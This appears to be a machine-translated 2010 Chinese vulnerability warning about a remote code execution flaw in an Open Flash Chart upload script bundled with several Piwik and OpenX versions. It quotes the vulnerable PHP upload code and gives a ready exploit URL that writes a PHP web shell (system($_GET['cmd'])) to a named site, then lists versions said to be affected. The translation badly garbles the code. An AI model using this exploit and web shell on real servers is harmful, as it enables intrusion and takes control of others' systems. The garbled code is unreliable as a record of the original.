Piwik and OpenX multi-version there PHP remote execution vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201027904
Type myhack58
Reporter 佚名
Modified 2010-09-20T00:00:00


The local test is successful

The current official also did not give out the patch

Analysis code:

<? PHP

/ This temporary file, we will upload the image file to save the default path / $ default_path ='.. / tmp-upload-images/';

/ Check whether the presence of the$ default_path variable / If (it! file_exists($ default_path)) / If true, enable the write permissions of the directory / mkdir($ default_path, 0 for 7 7 7, true);

/ Then, create the above with the file name of the directory from the form input“name”file/ / This variable is the state and not deleted after use / $Destination= $ default_path is. The basename with$ _GET this['name']);

Save your image: '. $destination;

/ Malicious code in here, and the attacker can execute this code / $jfh = fopen ($destination, ‘w’)or(“can't open file”); fwrite($ jfh, the$ HTTP_RAW_POST_DATA variable; fclose($ jfh);

it? & gt;

EXP: the http://www.hackqing.cn/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<? system($_GET['cmd']);?& amp;amp; gt;

Tested version successfully tested Piwik 0.4.3 Piwik 0.4.2 Piwik 0.4.1 Piwik 0.4 Piwik 0.2.37 Piwik 0.2.36 Piwik 0.2.35 OpenX 2.8.2 OpenX 2.8.6 OpenX 2.8.5 OpenX 2.8.4 OpenX 2.8.3